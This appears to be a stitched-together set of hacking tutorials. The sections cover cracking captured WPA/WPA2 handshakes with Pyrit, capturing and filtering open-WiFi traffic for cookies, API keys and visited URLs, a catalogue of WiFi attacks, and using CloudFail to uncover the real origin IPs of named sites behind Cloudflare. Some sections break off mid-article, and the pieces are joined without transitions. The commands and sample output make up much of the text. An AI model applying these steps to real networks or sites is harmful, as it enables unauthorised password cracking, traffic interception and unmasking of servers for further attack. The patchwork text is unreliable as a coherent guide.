
Advanced use of pyrit

The basic use of Pyrit, as well as the most efficient way to run an attack, is described in the section “Breaking a Handshake in Pyrit - the fastest way using graphics processors and preliminary calculation of hashes”. It is recommended to start reading there.

The workflow described there is the most common one. However, Pyrit has many more commands and options.


    Pyrit database structure. Import and export passwords

    Let's take a closer look at the components of the Pyrit database. First, there are passwords. The same passwords can be reused when attacking different Access Points. Two commands are used to import passwords:
    • import_passwords
    • import_unique_passwords
    Both commands accept passwords containing any characters (including NULL bytes) except the terminating newline character ("\n"). Passwords that are not suitable for WPA-/WPA2-PSK are ignored. That is, the cleaning of the password file that we performed earlier was not strictly necessary.

    The difference between these commands is that:
    • import_passwords checks the uniqueness of the passwords being imported, while import_unique_passwords does not: it imports all passwords, even those that already exist in the database.
    • import_unique_passwords is much faster.
    The command names make it look like there is an error in the documentation, since import_unique_passwords sounds like the one that should filter for unique passwords. But there is no error: that command simply expects its input to already be unique.

    Import speed with import_unique_passwords exceeds that of import_passwords many times over. So if you have a giant dictionary measured in gigabytes, you can save a lot of time on the import alone, provided, of course, that you are confident in its "purity" (no duplicate entries).

    By the way, passwords can be exported from the database to a file with the export_passwords command. Example of use:
    pyrit -o myword.txt.gz export_passwords
    As already mentioned, passwords can be reused many times, and Pyrit itself keeps the password database free of duplicates. But importing passwords takes as much time as calculating hashes. Each Access Point needs its own set of hashes, since the AP name (ESSID) is the salt in these hashes.

    We created our access point entry with the create_essid command. Some commands create the necessary table on their own if it is needed but does not exist yet. You can also create many ESSIDs at once: after the -i option, specify a file containing the list of ESSIDs (one AP per line). Re-creating an existing ESSID does not result in an error.
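To make the two points above concrete, here is an added example (not code from the original post or from Pyrit): it filters a constructed wordlist the way the import commands do, keeping only passwords usable for WPA/WPA2-PSK, and derives the Pairwise Master Key with the ESSID as salt, which is why hashes computed for one ESSID cannot be reused for another and why an unusual ESSID defeats generic precomputed tables. The "password"/"IEEE" pair is the standard's published test vector.

```python
# Added example, not part of Pyrit. Demonstrates (1) which passwords survive
# an import (8..63 printable ASCII characters) and (2) PMK derivation with
# the ESSID as salt, so every AP name needs its own hash table.
import hashlib

PBKDF2_ROUNDS = 4096   # fixed by the WPA/WPA2 standard
PMK_LENGTH = 32        # PMK size in bytes


def is_valid_psk_passphrase(password: bytes) -> bool:
    """True if usable as a WPA/WPA2-PSK passphrase: 8-63 printable ASCII bytes.

    Too short, too long, NUL bytes or non-ASCII bytes are all rejected, which
    is what 'passwords not suitable for WPA-PSK are ignored' means.
    """
    if not 8 <= len(password) <= 63:
        return False
    return all(0x20 <= b <= 0x7E for b in password)


def filter_wordlist(lines):
    """Mimic an import: strip the line terminator, keep only valid passphrases."""
    kept = []
    for line in lines:
        candidate = line.rstrip(b"\n")
        if is_valid_psk_passphrase(candidate):
            kept.append(candidate)
    return kept


def derive_pmk(password: bytes, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", password, essid, PBKDF2_ROUNDS, PMK_LENGTH)


def pmk_table(password: bytes, essids) -> dict:
    """The same password yields a different PMK for every ESSID (the salt)."""
    return {essid: derive_pmk(password, essid).hex() for essid in essids}


# Constructed wordlist, as reading a dictionary file in binary mode would yield it.
SAMPLE_WORDLIST = [
    b"short\n",                      # too short
    b"password\n",                   # valid
    b"caf\xc3\xa9-wifi-pass\n",      # non-ASCII byte
    b"nul\x00byte-pass\n",           # NUL byte
    b"x" * 64 + b"\n",               # too long
    b"ThisIsAPassword\n",            # valid
]

if __name__ == "__main__":
    print("imported:", filter_wordlist(SAMPLE_WORDLIST))
    for essid, pmk in pmk_table(b"password", [b"IEEE", b"NETGEAR"]).items():
        print(essid.decode(), pmk)
```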

    Pyrit attack implementations

    To calculate the hashes we used the batch command, and for the subsequent attack (checking against the hashes) we used the attack_db command. The following options are available:

    • attack_batch - if passwords have already been turned into hashes, those hashes are used; passwords that have not yet been "counted" into hashes are computed first, and then the check (attack) is run over all of them. In effect, attack_batch = batch + attack_db in one go. Supports options -b, -e and -o.
    • attack_cowpatty - Pyrit is not the only tool that can generate Pairwise Master Keys from passwords; genpmk can do this too. If we use a hash database generated in the cowpatty format, we use this command.
    • attack_db - runs the attack against previously calculated (with batch) hashes. Supports options -b, -e and -o.
    • attack_passthrough - this command bypasses the Pyrit database and should be used only if storage space is a problem (for example, on a LiveCD). Use attack_batch instead. Supports options -b, -e and -o.
    • batch - translates all passwords in the database into their respective Pairwise Master Keys and saves the results to the database. You can use the -e option to limit this command to a single ESSID; if the option is omitted, all ESSIDs are processed one by one in an undefined order.
    • passthrough - reads passwords from the file given with -i and computes their Pairwise Master Keys for the ESSID given with -e. The results are written to the file specified with -o in the cowpatty binary format and are not saved to the database for future use. That is, this command bypasses the need for a database and should only be used if storage space is a problem (for example, when running Pyrit from a LiveCD). The batch command provides exactly the same functionality as passthrough, but can perform much better, since results can be read from the database instead of being recalculated. In short, passthrough is like batch, except that the resulting hashes are not saved to the database but written to the output (here standard output).
    Example of practical use:
    pyrit -i dirty_words.txt.gz -e NETGEAR -o - passthrough | cowpatty -d - -r wpatestcapture.cap -s NETGEAR

    Distributed and remote use of resources with Pyrit

    Pyrit can act as a server and as a client. With a certain skill, you can organize a distributed calculation of hashes.
    relay
    Starts a server that relays another storage device via XML-RPC; other Pyrit clients can use this server as their storage. This lets Pyrit reach its own (file:// and sqlite://) or SQL databases hidden behind a firewall over the network and gives multiple clients access to the same database through the Pyrit RPC interface. TCP port 17934 must be open for this to work. For example, on the server (where the database is):
    pyrit -u sqlite:////var/local/pyrit.db relay
    and client (where is the big GPU):
    pyrit -u http://192.168.0.100:17934 batch
    -u URL
    To connect, use the -u option with a URL. It specifies the URL of the storage device in the form:
    driver://username:password@host:port/database
    Pyrit can use the file system, a remote Pyrit-Relay-Server and, if the python-sqlalchemy package is installed, a SQL database as storage. The file:// driver refers to Pyrit's own on-disk storage, http:// refers to a Pyrit-Relay-Server, and all other URLs are passed directly to python-sqlalchemy, if available. The default storage URL can also be set with the default_storage key in the Pyrit configuration file (for details, see the help and the FILES section).
    serve
    Launches a server that makes local computing hardware available to other Pyrit clients. The server's IP address must be added to the clients' configuration file as a space-separated list in known_clients, and the clients' rpc_server setting must also be 'true'. TCP and UDP ports 17935 must be reachable. For example, on the server (where the GPU is):
    pyrit serve
    and on the clients (the server's IP address has been added to known_clients and rpc_server is set to 'true'):
    pyrit -r test.pcap -b 00:de:ad:be:ef:00 -i words.txt attack_passthrough

    Handshake Search with Pyrit

    To identify handshakes, there are three commands:
    analyze - parses one or more capture files (in pcap format; gzip-compressed files are also supported) passed with the -r option and tries to identify the Access Points, Stations and EAPOL handshakes. Example:

    root@Kalitut:~/# pyrit -r DANIELLE2015-01.cap analyze
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
     
    Parsing file 'DANIELLE2015-01.cap' (1/1)...
    Parsed 35 packets (35 802.11-packets), got 3 AP(s)
     
    #1: AccessPoint 68:72:51:40:78:b5 ('@Office N.Y TMN WiFi 038-249734'):
    #2: AccessPoint 0c:54:a5:c0:24:d6 ('DANIELLE2015'):
      #1: Station e0:99:71:fa:d3:c9
      #2: Station 4c:8d:79:9c:06:54
      #3: Station 00:1f:3a:41:5e:70, 9 handshake(s):
        #1: HMAC_SHA1_AES, good, spread 1
        #2: HMAC_SHA1_AES, good, spread 1
        #3: HMAC_SHA1_AES, good, spread 1
        #4: HMAC_SHA1_AES, good, spread 3
        #5: HMAC_SHA1_AES, good, spread 3
        #6: HMAC_SHA1_AES, good, spread 3
        #7: HMAC_SHA1_AES, good, spread 3
        #8: HMAC_SHA1_AES, good, spread 7
        #9: HMAC_SHA1_AES, good, spread 7
      #4: Station 74:e2:f5:ba:bc:bc
    #3: AccessPoint 20:25:64:16:58:8c ('Mial'):
    strip - parses one or more capture files passed with the -r option, extracts only the packets needed to detect EAPOL handshakes and writes a new dump to the file given with the -o option. You can use the -e and -b options to filter for specific Access Points. Example:
    pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_compressed_dump_MyNetwork.dump.gz strip
    stripLive - parses a capture file passed with the -r option, extracts only the packets needed to detect EAPOL handshakes and writes a new dump to the file given with the -o option. It differs from strip in that the capture file can be a character device, including sockets and other pseudo-files that look like pcap files. stripLive writes the relevant packets to the new file (given with the -o option) as they arrive instead of trying to read the entire capture file first.

    Pyrit Hacking captured handshakes the fastest way using GPUs and pre-calculating hashes.

    Benefits of using Pyrit
    Cracking captured handshakes is the only way to break WPA/WPA2 passwords, and it is done by brute force.

    By the way, if you are not familiar with the handshake capture technique, then refer to the article “ Handshake Capture in Kali Linux ”.

    Intercept and analysis open WiFi traffic

    Is it dangerous to use open WiFi
    Internet access via WiFi is currently very popular: WiFi is in many apartments and workplaces. When using wireless access, it is important to maintain the security of your Access Point.

    Nowadays public WiFi networks are also very popular. They are in restaurants, gyms, shopping centres, subways, hotels, private hospitals and clinics, apartment buildings and condominiums; they can be found almost everywhere that many people gather.

    These networks have a distinctive feature: often they are open WiFi networks, to which no password is required to connect. Are there any additional security rules for working with such networks?

    Yes, when using an open WiFi network, you need to be well aware that:
      • all data is transmitted by radio waves; unlike wires, which are far from accessible to everyone, radio waves can be intercepted by anyone within range
      • in open networks, data is not encrypted
      With the first point I think everything is clear: if someone with a computer and a WiFi card is close enough, they can capture and save all the traffic transmitted between the wireless Access Point and all its clients.
      As for the second point, it is worth clarifying what encryption of the transmitted data means. For example, if you open a website that uses the HTTPS protocol (that is, a secure protocol), say https://fb.com/, then the data transmitted to this site and from the site back to you is encrypted. If you open a website that uses the HTTP protocol, then all the transmitted data (which pages you visited, which comments you left, which cookies your web browser received) is transmitted unencrypted. Now, if you are connected to a WiFi Access Point that requires a password, then the transmitted traffic is encrypted once more. That is, if you open a site over HTTPS, the traffic is encrypted twice (first between the web browser and the web server in both directions, and a second time between your device and the Access Point in both directions). And if you open a site over HTTP, the traffic is encrypted only once (only between your device and the Access Point and back).

      But open access points do not encrypt traffic. This means that if you use an open access point and open a website that runs over HTTP, your data is transmitted in the clear and anyone near you can capture and save it. If you open a site over HTTPS, that data is encrypted; however, an observer can still see exactly which sites you opened (although not which pages you viewed or, for example, which comments you left).

      So: remember that open wireless networks are subject to interception.
      Next, I will show an example of data interception, which will make clearer what exactly an attacker can see.

      Intercept open WiFi networks traffic


      For a successful attack you need a computer running Linux (for example, Kali Linux or BlackArch) and a WiFi card from this list.

      Let's start by looking at the names of the wireless interfaces:
      iw dev
      As you can see, I have several wireless interfaces; I will use wlp0s20f0u2.

      Putting the wireless interface in monitor mode:
      sudo ip link set INTERFACE down 
      sudo iw INTERFACE set monitor control 
      sudo ip link set INTERFACE up
      In the previous commands, replace INTERFACE with the name your wireless interface has on your system. For example, for wlp0s20f0u2 the commands look like this:
      sudo ip link set wlp0s20f0u2 down 
      sudo iw wlp0s20f0u2 set monitor control 
      sudo ip link set wlp0s20f0u2 up
      Run airodump-ng with a command like:
      sudo airodump-ng INTERFACE -t OPN
      Where:
      • INTERFACE - the name of the wireless interface in your system
      • -t OPN - a filter that shows only open WiFi networks
      My interface is called wlp0s20f0u2, so I run the following command:
      sudo airodump-ng wlp0s20f0u2 -t OPN
      An example of the data obtained:
      BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID 
                                                                                                   
      00:15:6D:9A:26:C0  -35       19      454    8   1   65  OPN              Anan Apartment      
      00:15:6D:9C:26:84  -45       29        1    0   6   65  OPN              Anan Apartment      
      00:27:22:02:C0:D0  -64       17        0    0   1   65  OPN              Anan Apartment     
      C8:3A:35:01:3F:90  -78        9        1    0  11  135  OPN              Tenda
      As you can see, there are several open Access Points at once. In principle, you can choose any of them to intercept data, but remember that for successful analysis it is important to capture the data transmitted both by the AP and by the Clients. That is, I could choose to capture a distant AP and would probably capture most of its wireless frames, but Clients usually have weaker transmitters, and they may also be further away from me than the Access Point itself. For this reason it is better to choose the closest AP. The higher the PWR value, the better the signal (just in case, a reminder: these are negative numbers, so the closer to zero, the larger the value). For example, in my situation I choose the AP with a signal of -35.

      Directional antennas can significantly improve the quality of a wireless connection if pointed in the right direction. For capturing data, however, it is better not to use a directional antenna, since the AP may be in one direction and its Clients in others. It is advisable to use a large external antenna.

      It does not matter whether the AP is a hotspot with authorization in a web interface (a Captive Portal; see "How to bypass Captive Portal") or simply an open Access Point: the described interception method works the same for either.

      To capture data, run airodump-ng again , but with a command like this:
      sudo airodump-ng INTERFACE --channel NUMBER --write openap
      Where:
      • INTERFACE - the name of the wireless interface,
      • --channel NUMBER - the number of the channel the target AP operates on,
      • --write openap - option to save captured data to a file. In this case the file name will begin with openap (change it to your liking).
      For example, I want to listen to the AP that runs on the first channel, for this I want to use the wlp0s20f0u2 wireless interface and save the captured information to a file that starts with openap, then my command is as follows:
      sudo airodump-ng wlp0s20f0u2 --channel 1 --write openap
      Analysis of traffic
      Next, wait for enough data to be collected. You can analyze data directly in the process of capturing - without stopping airodump-ng.

      Analysis of open WiFi network traffic


      While airodump-ng is running, a file with the .cap extension is created, for example openap-01.cap.

      To analyse the data you can use various programs; I will show analysis of wireless traffic with Wireshark.

      Open the file with the captured data in Wireshark.

      To highlight different kinds of data we need Wireshark filters. Here I show only a few of them as examples; it is recommended to study the large selection of useful Wireshark filters here.

      To assess the quality of capture, you can start with filters that display the results of the TCP protocol analysis.
      For example:
      tcp.analysis.duplicate_ack_num == 1
      This filter displays frames with the ACK flag that are duplicates. A large number of such frames may indicate communication problems between the Client and the Access Point.
      Filter showing frames for which the previous segment was not captured:
      tcp.analysis.ack_lost_segment
      This is normal at the beginning of a capture, because the capture did not start from the beginning of the connection. But if this error keeps occurring later on, you are too far from the Access Point or the Clients and are missing some of the data they transmit.

      To display frames that are retransmission (resend):
      tcp.analysis.retransmission
      A large number of such frames may indicate that there is a poor connection between the Client and the AP and they often have to resend the same data.
      Using the filter:
      arp
      you can see the ARP traffic; with its help it is convenient to see how many devices are currently connected to the local network and what IP and MAC addresses they have.
      Using the filter
      dns
      you can see all the DNS requests sent.
      These requests reveal which sites users have visited (even if those sites use HTTPS!), as well as which online services were requested.

      For example, in the screenshot you can see the addresses of the online cinema Netflix, Facebook, various Google services.

      To show HTTP traffic, use the filter:
      http
      Here you can find a lot of interesting information. For example, you can see requests to services and the data transmitted, including API keys, device identifiers, and so on.
      You can see the visited URLs with all the parameters passed.
      You can see the files downloaded and opened on the Internet.
      You can save any transferred file. To do this:
      (1) select the packet that contains it with the mouse;
      (2) in the middle pane with the packet details, scroll to the bottom to find the data field and right-click it to open the context menu;
      (3) in the context menu, choose Export Selected Packet Bytes.
      Enter a file name, select a location and save it.
      Using filter
      http.cookie
      You can see HTTP requests in which cookies were transmitted. And using the filter
      http.set_cookie
      you can see the responses in which the server set cookies in the user's browser. To search for any transferred images:
      http.content_type contains "image"
      To search for specific types of images:
      http.content_type contains "gif"
      http.content_type contains "jpeg"
      http.content_type contains "png"
      To search for files of a specific type:
      http.content_type contains "text"
      http.content_type contains "xml"
      http.content_type contains "html"
      http.content_type contains "json"
      http.content_type contains "javascript"
      http.content_type contains "x-www-form-urlencode"
      http.content_type contains "compressed"
      http.content_type contains "application"
      Search Wireshark requests for receiving files of a certain type. For example, to search for transferred ZIP archives:
      http.request.uri contains "zip"
      Instead of http.request.uri for greater accuracy, you can use http.request.uri.path or http.request.uri.query filters , for example, to search for requests to download JPG files (links to pictures):
      http.request.uri.path contains "jpg"
      A filter that shows only the data sent by the POST method:
      http.request.method == "POST"
      A filter that shows only the data transmitted by the GET method:
      http.request.method == "GET"
      Search for requests to a specific site (host):
      http.host == ""
      Search requests to a specific site by name:
      http.host contains "www.facebook.com"
      Conclusion
      Nowadays the number of applications and sites that do not use encryption is rapidly decreasing, so the danger of such interception decreases every year. Nevertheless, it still exists.

      How to strengthen the signal WiFi

      There are situations when we have access to a WiFi network (we know the password), but the signal is weak and not all of our devices can work stably or even connect to the wireless network. This can happen both when using a neighbour's WiFi from the house opposite, and in quite legitimate situations, for example in a hotel with one access point for the whole floor (or even only in the lobby). As a result, for example, a laptop can connect to a WiFi network with a weak signal while a mobile phone simply does not see it.

      Some routers have a repeater function and can be used to amplify a weak WiFi signal. But a router with such a function is not always available (especially when travelling), so I will consider a slightly different option.

      Putting a wireless card into monitor mode on Kali Linux

      Putting a wireless card into monitor mode on Kali Linux using the ip and iw commands
      Almost any attack on WiFi begins with switching the card to monitor mode.
      To do this you can use the airmon-ng tool, but a better way is to use the ip and iw commands.
      With the "manual" way of switching to monitor mode the interface keeps its own name (if it was wlan0 it stays wlan0), whereas airmon-ng creates a virtual interface when it enables monitor mode on a WiFi adapter. So, to begin, let's look at the name of the wireless interface:

      Types of WiFi attacks

      For myself, I group the types of attacks on wireless access points as follows:

      • Hacking WPA / WPA2 passwords
      • WEP attack
      • Hacking WPS Pin
      • WPA downgrade
      • Replacing a true access point with a fake
      • Scam Access Point
      • Attack on WiFi access point from the global and local networks
      • Denial of Service Attacks (WiFi DoS)
      • Attacks on specific services and functions of routers

      Let us characterize each of them in somewhat more detail.

      Hacking WPA / WPA2 passwords
      This is the most universal attack on WiFi. Its advantage is that it applies to all access points that use WPA / WPA2 (most of them).

      There are also disadvantages that arise from the strength (reliability) of WPA / WPA2. They are that:

      • to carry out the attack, the AP must have connected clients;
      • the password is recovered by brute force.

      That is, with a strong password, cracking the WiFi in a reasonable time will not work.

      WEP attack
      This group of attacks includes more than recovering the password in plain text. For WEP, a number of different attacks have been discovered and implemented that achieve the desired result even without recovering the passphrase.

      Unfortunately, WEP cracking is now fading into the background, as the number of APs that use it is constantly decreasing.

      Hacking WPS Pin
      The situation is similar to WEP. It is good for cracking; just recently (less than a year ago) a new hole was revealed which, instead of the usual hours for breaking WPS, takes several seconds.

      And it has exactly the same problem as WEP: lack of universality. The number of APs with WPS enabled is getting smaller and smaller.

      WPA downgrade
      As noted just above, WPA/WPA2 provides sufficiently reliable protection if the user has not chosen a simple password. Since no new technical methods have been proposed so far, several social-engineering methods have been implemented instead. This is one of them.

      Stations and APs are continuously deauthenticated by sending WPA-encrypted packets. The goal is to convince the user that WPA is malfunctioning and push them to switch to WEP or disable encryption. This attack is implemented in mdk3. mdk3 lets clients work with WEP or without encryption, so there is a chance the system administrator will simply decide "WPA is broken" (which can happen with incompetent staff). This can/should be combined with social engineering.

      Replacing a true access point with a fake
      The bottom line is that the access point is suppressed by endlessly sending deauthentication packets. At the same time, the attacker "raises" their own AP with similar characteristics and waits for users to connect to it.
      Then, under various pretexts, WPA/WPA2 passwords are lured out of the users.

      The most complete implementation of this attack is, for example, wifiphisher.

      As in the previous case - this is social engineering. The probability of a successful outcome is proportional to the incompetence of the opposite side.

      Scam Access Point
      This is not really an attack on WiFi. Rather, it is an attack using WiFi.

      The bottom line is that the attacker sets up an open Internet access point. Unsuspecting lovers of freebies connect to it, and meanwhile the attacker carries out all sorts of attacks to intercept passwords, sessions and cookies, or to redirect to fraudulent sites.

      Attack on WiFi access point from the global and local networks
      This is a rather underrated problem. Just think: a huge number of people have a wireless router or modem at home. As a rule, few go further than setting up the Internet and WiFi. Few bother to change the administrator password, and very few update their device firmware in time.

      And this whole set of devices with admin:password credentials is beautifully visible to scanners on the local or global network... (there are exceptions; for example, devices with grey (private) addresses behind NAT are not visible from the global network, but nobody has cancelled their visibility on local networks).

      And there are already implementations of a mass attack on default credentials and known router vulnerabilities: Router Scan by Stas'M .

      The situation is similar to the anecdote: "The Gestapo overlaid all exits, but Stirlitz went out through the entrance ."

      And every year the number and variety of devices connected to the network only increases. A natural consequence is a growing number of devices that nobody configures at all: web cameras, file servers, TVs with WiFi (and with built-in video cameras, by the way), and various other smart-home elements are added to them.

      Denial of Service Attacks (WiFi DoS)
      The attack is quite simple and very effective. Its essence is the endless sending of deauthentication packets.

      You can protect yourself from such an attack only by connecting to the router via a wire. As with all other DoS attacks, no data leaks; only normal operation is disrupted. And, as with other DoS attacks, once it stops everything returns to normal on its own.

      Attacks on specific services and functions of routers
      Modern advanced routers have USB ports to which you can connect flash drives, hard drives, 3G modems and other peripherals. Routers, besides their usual functions, can be file servers, web servers, torrent clients, etc.

      There are two dangers here: a vulnerability in a secondary service, or incorrect configuration (for example, factory passwords), either of which can allow an attacker to seize control.

      how to find ip behind cloudflare

      Cloudflare is an intermediary between the user and the site. It works on the principle of a reverse proxy, providing additional services including page caching, protection against DDoS, protection against bad bots, and more. Among other things, Cloudflare hides the true IP address of the server that hosts the site.
      Cloudflare uses its own name servers to answer DNS queries and translate host names into IP addresses. That is, the site owner configures their domain to use Cloudflare's NS servers, and in response to DNS requests these NS servers return IPs belonging to the Cloudflare network. As a result, the request for the site goes to Cloudflare, which fetches the page from the server where the site is hosted (or from its cache) and shows it to the user who requested it. So the true IP address of a site behind Cloudflare is well hidden.

      If Cloudflare is configured correctly, then the real IP address of the site is never disclosed or recorded anywhere; but how many people do you know who always do everything right? For this reason, there are tools that look for holes in your Cloudflare settings. One of these tools is CloudFail , and this note is devoted to it.

      What CloudFail is and how it works
      Each site can have subdomains of the form *.site.com, where different values can be substituted for the asterisk, for example:
      • www.site.com
      • en.site.com
      • forum.site.com
      • test.site.com
      • admin.site.com
      • 111.site.com
      • chat.site.com
      There can be an unlimited number of such subdomains. Important point: each such subdomain can have its own IP address!

      That is, name servers allow you to specify an IP (or several addresses at once) for site.com, another IP for test.site.com, another IP for en.site.com and so on.

      So there may be a situation where the DNS records for site.com contain a Cloudflare IP address, but the DNS records for the subdomain test.site.com point to another IP that is not under Cloudflare's protection.

As a result, an IP address is disclosed that:
• may be the real IP address of the site;
• or is the IP address of the subdomain only, but still gives us information about the owner or a hint for further research.
We cannot simply obtain a list of all subdomains, so the various options have to be enumerated. This is exactly what CloudFail implements:
• various subdomain candidates are tried;
• if a DNS record exists for a candidate, its IP is obtained;
• the IP is checked against the Cloudflare ranges (i.e. whether it is protected by Cloudflare or not).
In fact, the process just described is already the third stage. In the first stage, CloudFail retrieves a list of possible subdomains from DNSDumpster.com and checks them.

In the second stage, CloudFail queries the CrimeFlare service, which has gathered a large database of IP addresses for sites protected by Cloudflare. If the site's IP is known there, it is shown immediately. CrimeFlare is described in more detail here.

And in the third stage, the dictionary-based subdomain brute force described above is performed.

As a result of this combined approach, it is often possible to find IP addresses that are not protected by Cloudflare.
It is important to note that we proceed from the assumption that the IP addresses of the subdomains belong to, or are associated with, the owner of the main site. This is usually the case, but always remember that in the DNS records of subdomains the owner of the main domain can specify ANY IP addresses, even ones that do not belong to him.
How to install CloudFail
To install CloudFail on Ubuntu, Kali Linux, Debian, Linux Mint and their derivatives, run the following commands.
First, install pip3 for the Python 3 dependencies:
sudo apt-get install python3-pip
Then run these commands:
sudo apt update
sudo apt install python3-pip git tor
git clone https://github.com/m0rtem/CloudFail
cd CloudFail/
Then install the dependencies:
pip3 install -r requirements.txt
Before the first launch, and from time to time afterwards (about once a month), it is recommended to update the databases:
sudo python3 cloudfail.py -u
This updates the list of Cloudflare IP addresses as well as the CrimeFlare database containing known IP addresses for some sites.
If you want the program to work through the Tor network, start the Tor service:
systemctl start tor
If you do not need Tor for sending requests, you can skip this step.
Optionally, add the Tor service to autostart (then you will not need to start it after each reboot):
sudo systemctl enable tor
How to use CloudFail
The program has only one mandatory option, -t, after which you specify the domain name.
Additionally, you can use the --tor option to send requests through that network.

The program ships with a word list (the subdomains.txt file) for dictionary-based discovery of possible subdomains. If you want to use your own dictionary, specify it with the -s option. The dictionary file must be located in the data folder.

For example, to obtain data for the tinyjpg.com site, the launch command looks like this:
sudo python3 cloudfail.py -t tinyjpg.com --tor
CloudFail Results Analysis
The line ... is part of the Cloudflare network! says that the site is protected by the Cloudflare network. If this were not the case, the scan would stop at this point, since continuing would be meaningless.

The line Testing for misconfigured DNS using dnsdumpster... marks the beginning of the first stage: the retrieval of known hosts (subdomains) associated with the analyzed site. This data is taken from dnsdumpster, which in turn collects it from various sources (its own scans of the Alexa Top 1 million sites, search engines, popular scanners, Certificate Transparency, MaxMind, Team Cymru, Shodan and scans.io). Subdomain brute-forcing is not used at this stage.

As you can see, among the DNS records found in our results there are MX records pointing to mail servers. Note that in this case the MX records point not to subdomains of the site of interest but to Google hosts; the IP data (addresses belonging to Google) confirms this. These hosts are not protected by Cloudflare, but they are of no use for discovering the server's real IP through open sources. We can only conclude that the site uses e-mail based on Google's mail service.

The line Scanning crimeflare database... marks the beginning of the second stage: searching CrimeFlare's database of sites with known IPs.

The message Did not find anything. says that nothing was found in this database.

The line Scanning 2897 subdomains (subdomains.txt), please wait... marks the beginning of the third stage: enumeration of possible subdomains from the dictionary.

Red lines contain information about subdomains that were found but whose IPs are protected by the Cloudflare network; they are therefore useless for determining the real IP (though they can be used for other purposes).

Green lines indicate that the IP of the found host does not belong to Cloudflare and may therefore be the real IP of the site of interest.

An example of such a line in our case is mail.anti-malware.ru; unfortunately, the IP found again belongs to Google.
But the line test.anti-malware.ru leads us to success: this is the IP of a VPS server.
Searching for other sites hosted on this IP confirms that it is the real IP of the domain of interest.
The next scan example is searchengines.guru.

The results obtained show that the first and third stages produced nothing, but the CrimeFlare database holds the real IP of this site: 159.253.17.89.
Scanning searchengines.ru:

In the first stage, only Google's mail servers were found. The site was not found in the CrimeFlare database.
In the third stage, the following useful data turned up:
      [09:19:32] [FOUND: SUBDOMAIN] cdn.searchengines.ru IP: 54.192.98.230 HTTP: 403  
      [09:20:51] [FOUND: SUBDOMAIN] link.searchengines.ru IP: 90.156.201.86 HTTP: 200 
      [09:21:06] [FOUND: SUBDOMAIN] mail.searchengines.ru IP: 64.233.164.121 HTTP: 200
mail.searchengines.ru points to the IP of Google's mail server.

cdn.searchengines.ru has a CloudFront IP, one of the Cloudflare services, i.e. it also does not suit us.

But link.searchengines.ru has the IP address (90.156.201.86) of a third-party server. If you open the link.searchengines.ru page, you find some forgotten online service, apparently unused for many years. This IP may also be the address of searchengines.ru itself. In any case, it is associated with the owners of searchengines.ru, even if the main site is hosted on a different server.
How to set up Cloudflare correctly so that the real IP of the site cannot be found
As the examples above show, incorrect DNS configuration discloses the site's IP even when it is protected by Cloudflare. All hosts related to the site must be protected by the Cloudflare network. The same applies to wildcard DNS records: such records must not reveal the true IP address of the site.

Remember also that the owner can be disclosed through the hosts of the mail servers used by the site.

The site itself should not contain vulnerabilities that allow an attacker to carry out attacks of other kinds.
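As an added example (my own code, not CloudFail's), here is the check that the third stage performs and that a site owner can run against his own zone before an enumeration tool does: parse FOUND: SUBDOMAIN lines of the kind shown in the searchengines.ru results, test each IP against Cloudflare's published ranges, and list the hosts that sit outside them. The Cloudflare ranges below are an assumed partial snapshot (the authoritative list is the one `cloudfail.py -u` refreshes); the sample input is the three lines from the scan above plus one constructed line (www.example.com on a Cloudflare address) for contrast.

```python
import ipaddress
import re

# Assumption: a partial snapshot of Cloudflare's published IPv4 ranges.
# The authoritative list is the one `cloudfail.py -u` refreshes from Cloudflare.
CLOUDFLARE_RANGES = [ipaddress.ip_network(net) for net in (
    "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "104.16.0.0/13", "104.24.0.0/14", "108.162.192.0/18",
    "131.0.72.0/22", "141.101.64.0/18", "162.158.0.0/15",
    "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
    "190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
)]

# Matches CloudFail's "[hh:mm:ss] [FOUND: SUBDOMAIN] host IP: a.b.c.d HTTP: nnn" lines.
FOUND_RE = re.compile(
    r"^\[(?P<time>\d\d:\d\d:\d\d)\]\s+\[FOUND: SUBDOMAIN\]\s+(?P<host>\S+)\s+"
    r"IP:\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+HTTP:\s+(?P<status>\d{3})"
)

# Sample input: the three lines from the searchengines.ru scan above, plus one
# constructed line (www.example.com on a Cloudflare address) for contrast.
SAMPLE_LINES = """
[09:19:32] [FOUND: SUBDOMAIN] cdn.searchengines.ru IP: 54.192.98.230 HTTP: 403
[09:20:51] [FOUND: SUBDOMAIN] link.searchengines.ru IP: 90.156.201.86 HTTP: 200
[09:21:06] [FOUND: SUBDOMAIN] mail.searchengines.ru IP: 64.233.164.121 HTTP: 200
[09:21:30] [FOUND: SUBDOMAIN] www.example.com IP: 104.16.1.1 HTTP: 200
""".strip().splitlines()


def is_cloudflare(ip: str) -> bool:
    """True if the address falls inside one of the Cloudflare ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_RANGES)


def parse_found_line(line: str):
    """Parse one FOUND: SUBDOMAIN line into a dict, or None if it is not one."""
    match = FOUND_RE.match(line.strip())
    if match is None:
        return None
    return {
        "host": match["host"],
        "ip": match["ip"],
        "status": int(match["status"]),
        "cloudflare": is_cloudflare(match["ip"]),
    }


def exposed_hosts(lines):
    """Return (host, ip) pairs whose IP is outside Cloudflare: exactly the
    records a site owner must proxy through Cloudflare or remove from DNS."""
    found = (parse_found_line(line) for line in lines)
    return [(r["host"], r["ip"]) for r in found if r and not r["cloudflare"]]


if __name__ == "__main__":
    for host, ip in exposed_hosts(SAMPLE_LINES):
        print(f"exposed: {host} -> {ip}")
```

The same membership test, applied to every A record in your own zone (wildcard records and the hosts named by your MX records included), is the audit the configuration section above asks for; anything it reports is a candidate for proxying through Cloudflare or for removal from DNS.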

Directory Traversal attack in practice

Today I want to show you in practice how the Directory Traversal (Path Traversal) attack can be used. It is a very simple and popular attack, but with its help you can reach important information on the server. How this is done, and what the main features of the attack are, I will discuss in this article. We plan to release a whole series of articles on web security, so I recommend that you follow along so as not to miss the next ones.
What is Directory Traversal, and how many slashes are needed?
